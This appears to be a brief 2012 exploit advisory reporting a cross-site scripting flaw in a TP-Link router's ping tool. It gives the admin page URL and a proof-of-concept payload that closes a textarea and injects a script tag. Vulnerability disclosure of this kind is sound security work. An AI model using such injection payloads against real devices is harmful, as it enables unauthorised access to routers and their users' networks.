TP-Link suffers from a cross site scripting vulnerability.
52f46d4983db977b1f7c9d61d6fd43f4fd34ca96757f6af9ad673265ee9d6018
# Exploit Title: Tp-Link Cross Site Scripting
# Date: 11.03.2012
# Author: l20ot
# Web Browser : Mozilla Firefox
# Blog : http://www.twitter.com/l20ot
------------------------------------------------------
Vulnerability is on Ping tool.
1- Go to http://192.168.1.1/maintenance/tools_test.htm
2- make ping like </textarea><script>prompt(2)</script>
Here is the video: http://s1.picofile.com/file/7325607418/tplinkXSS.mp4.html